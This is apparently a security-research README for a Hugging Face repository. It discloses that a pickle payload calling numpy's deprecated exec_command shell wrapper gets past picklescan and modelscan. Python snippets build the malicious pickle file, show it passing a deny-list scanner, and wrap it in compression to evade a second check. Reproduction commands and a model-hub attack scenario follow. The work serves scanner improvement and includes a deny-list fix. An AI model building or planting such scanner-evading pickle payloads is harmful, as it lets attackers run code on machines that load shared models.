This repository contains a proof-of-concept exploit payload for security research purposes. Access to the pickle payload and PoC code requires acknowledgement of responsible use. By requesting access, you confirm you are a security researcher, penetration tester, or student using this material for defensive/educational purposes only.
# numpy.distutils.exec_command: Payload-Layer Deny-List Gap
**Security Research / Responsible Disclosure.** This repository is part of a systematic study of pickle scanner bypass techniques. The payload demonstrates a detection gap in ML model security scanners. Access to `malicious_model.pkl` and `poc.py` requires a request; see the gate above.
## Summary

Scanner scores for `malicious_model.pkl`:
| Scanner | CRITICAL | WARNING | Bypassed? |
|---|---|---|---|
| modelaudit 0.2.37 | 1 | 0 | Partial |
| picklescan 1.0.4 | 0 | 0 | Yes |
| modelscan | 0 | 0 | Yes |
## Vulnerability

`numpy.distutils.exec_command.exec_command(command)` executes a shell command and returns `(status, output)`. It was deprecated in NumPy 1.17 and is documented as a thin wrapper around `subprocess.Popen`. It remains importable wherever the legacy `numpy.distutils` package is still present (NumPy < 2.0, or environments with a compatibility shim).

`subprocess.Popen` is in `ALWAYS_DANGEROUS_FUNCTIONS`; `numpy.distutils` wraps the same syscall path but is not. modelaudit's entry for `numpy.distutils` sits in `RISKY_ML_MODULE_PREFIXES`, which fires a WARNING on a bare import reference (S205) but does not automatically trigger a CRITICAL on REDUCE.
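The bare-reference vs. REDUCE distinction is visible directly in the opcode stream. The sketch below uses hand-assembled protocol-0 pickles, parsed statically with the standard library's `pickletools` and never unpickled; the byte strings are illustrative stand-ins, not the gated payload:

```python
import pickletools

# Bare import reference: GLOBAL pushes the callable, STOP returns it uncalled.
# A prefix-based rule like modelaudit's S205 warns on this alone.
ref_only = b"cnumpy.distutils.exec_command\nexec_command\n."

# Same GLOBAL, but followed by MARK/STRING/TUPLE and then REDUCE: the callable
# is actually invoked during unpickling, which is what a REDUCE rule escalates on.
with_reduce = b"cnumpy.distutils.exec_command\nexec_command\n(S'id'\ntR."

def opcode_names(payload: bytes) -> list[str]:
    """Statically list opcode names without ever executing the pickle."""
    return [op.name for op, _arg, _pos in pickletools.genops(payload)]

print(opcode_names(ref_only))     # no REDUCE: import reference only
print(opcode_names(with_reduce))  # contains REDUCE: the call fires on load
```

Because `pickletools.genops` only tokenizes the byte stream, this inspection is safe to run even on hostile input.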
## Proof of Concept

`malicious_model.pkl` in this repository is the exploit payload. `poc.py` builds and tests it with full scanner output.
### How the PoC was built

```python
# See poc.py
```
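The gated `poc.py` is not reproduced here, but the general construction is standard pickle abuse: emit a GLOBAL opcode naming the target callable, then REDUCE it with an argument tuple. Below is a hand-assembled sketch assumed to be equivalent in spirit to `poc.py` (the command string matches the verification step in the reproduction instructions); the bytes are only written and statically disassembled here, never unpickled:

```python
import pickletools

# Hand-assembled protocol-0 pickle:
#   GLOBAL numpy.distutils.exec_command exec_command
#   MARK, STRING <command>, TUPLE
#   REDUCE, STOP
# Unpickling this on a machine with numpy.distutils present would run the
# shell command; this script only writes and inspects the bytes.
command = "touch /tmp/scanner_bypass_proof.txt"
payload = (
    b"cnumpy.distutils.exec_command\nexec_command\n"
    b"(S'" + command.encode() + b"'\n"
    b"tR."
)

with open("malicious_model.pkl", "wb") as f:
    f.write(payload)

pickletools.dis(payload)  # static disassembly: shows GLOBAL followed by REDUCE
```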
### Affected file formats

Pickle (`.pkl`, `.pt`, `.bin`, `.joblib`): any file deserialized via `pickle.loads()`, `torch.load()`, `joblib.load()`, or an equivalent pickle-based loader.
### Conditions required to trigger

- Target calls `pickle.loads(untrusted_bytes)` or loads a model file via any pickle-based loader
- The scanner performs static analysis only (no sandboxed execution)
- The scanner checks GLOBAL/STACK_GLOBAL opcodes against a deny list
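These conditions can be made concrete with a toy static scanner. The sketch below mimics the deny-list check such tools perform; the deny-list contents and function names are illustrative, not modelaudit's or picklescan's actual internals. It flags `subprocess.Popen` but, like the real scanners, passes the `numpy.distutils` payload:

```python
import pickletools

# Illustrative deny list; real scanners carry far larger ones.
ALWAYS_DANGEROUS = {
    "subprocess Popen",
    "os system",
    "builtins eval",
}

def static_scan(payload: bytes) -> list[str]:
    """Resolve GLOBAL/STACK_GLOBAL targets and check them against the deny list."""
    findings = []
    str_stack = []  # track pushed strings so STACK_GLOBAL can be resolved
    for opcode, arg, _pos in pickletools.genops(payload):
        if opcode.name in ("UNICODE", "BINUNICODE", "SHORT_BINUNICODE"):
            str_stack.append(arg)
            continue
        if opcode.name == "GLOBAL":
            target = arg  # genops yields "module name" as a single string
        elif opcode.name == "STACK_GLOBAL" and len(str_stack) >= 2:
            target = f"{str_stack[-2]} {str_stack[-1]}"
        else:
            continue
        if target in ALWAYS_DANGEROUS:
            findings.append(f"CRITICAL: {target}")
    return findings

popen_payload = b"csubprocess\nPopen\n(S'id'\ntR."
gap_payload = b"cnumpy.distutils.exec_command\nexec_command\n(S'id'\ntR."

print(static_scan(popen_payload))  # flagged
print(static_scan(gap_payload))    # empty: the deny-list gap
```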
## Reproduction Steps

```bash
# 1. Request access above, then clone
git clone https://huggingface.co/SiggytheShark/pickle-bypass-numpy-distutils-exec
cd pickle-bypass-numpy-distutils-exec

# 2. Install the scanners
pip install modelaudit picklescan modelscan

# 3. Scan: observe that the scores match the table above
modelaudit scan malicious_model.pkl
picklescan --path malicious_model.pkl
modelscan -p malicious_model.pkl

# 4. Execute to confirm RCE/side effect
python3 poc.py

# 5. Verify
ls /tmp/scanner_bypass_proof.txt
```
## Security Impact
**Bypass mechanism:** the payload evades static analysis while achieving its effect (code execution, file write, or network connection) when `pickle.loads()` is called.

**Real-world scenario:** an attacker uploads this payload to a model hub. A victim downloads and loads it. The scanner reports the file as safe (0 CRITICAL). The payload fires silently: the return value of `pickle.loads()` looks like a normal Python object while the side effect has already occurred.
## Full Technical Writeup
Score:

- modelaudit static: WARNING only (S205 via `RISKY_ML_MODULE_PREFIXES`)
- modelaudit S201 REDUCE: CRITICAL (dynamic REDUCE pattern analysis)
- picklescan: 0 findings
- modelscan: 0 findings
Technique: deprecated NumPy distutils shell wrapper absent from all static deny lists

Scanner versions: modelaudit 0.2.37, picklescan 1.0.4
### Mechanism

As described under Vulnerability above: `exec_command` is a deprecated thin wrapper around `subprocess.Popen` that still reaches the shell, yet appears in no static deny list; only modelaudit's dynamic REDUCE analysis flags it, and only when the callable is actually REDUCEd.
### Scanner Comparison
| Scanner | Detection | Mechanism |
|---|---|---|
| modelaudit static | WARNING only | `numpy.distutils` in `RISKY_ML_MODULE_PREFIXES` → S205 |
| modelaudit S201 | CRITICAL | REDUCE pattern analysis fires when callable is actually REDUCEd |
| picklescan | 0 findings | Not in UNSAFE_GLOBALS |
| modelscan | 0 findings | Not in deny list |
This is the only entry in the study that scores 0/0 from both picklescan and modelscan even when the REDUCE opcode is present.
### Distinction: Payload-Layer vs Container-Layer

- `23_joblib_compression/` is a container-layer bypass: picklescan cannot read the file
- This is a payload-layer bypass: `exec_command` is not in any static deny list

They compose: a compressed joblib file containing an `exec_command` payload evades picklescan twice over.
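The composition can be sketched without joblib itself. joblib's compressed containers are, roughly, a framed zlib/gzip stream around ordinary pickle bytes; the sketch below uses plain gzip as a stand-in (an assumption for illustration; joblib's actual framing differs). An opcode-level scanner that does not decompress first sees no pickle opcodes at all:

```python
import gzip
import pickletools

# The payload-layer bypass from this entry...
payload = b"cnumpy.distutils.exec_command\nexec_command\n(S'id'\ntR."
# ...wrapped in a compressed container (gzip as a stand-in for joblib framing).
container = gzip.compress(payload)

def opcode_scan_succeeds(blob: bytes) -> bool:
    """True if the blob parses as a raw pickle opcode stream."""
    try:
        list(pickletools.genops(blob))
        return True
    except Exception:
        return False

print(opcode_scan_succeeds(payload))    # raw pickle: opcodes visible
print(opcode_scan_succeeds(container))  # compressed: opcode scan fails outright
```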
### Recommended Fix

Add `numpy.distutils.exec_command.exec_command` to `ALWAYS_DANGEROUS_FUNCTIONS`, and promote `numpy.distutils` from `RISKY_ML_MODULE_PREFIXES` to `ALWAYS_DANGEROUS_MODULES`: no sklearn or PyTorch checkpoint has a legitimate use for NumPy's deprecated build-toolchain internals.
### Requirements

```bash
pip install "numpy<2"  # numpy.distutils must be available (NumPy < 2.0 or legacy shim)
```
General Analysis / Security Research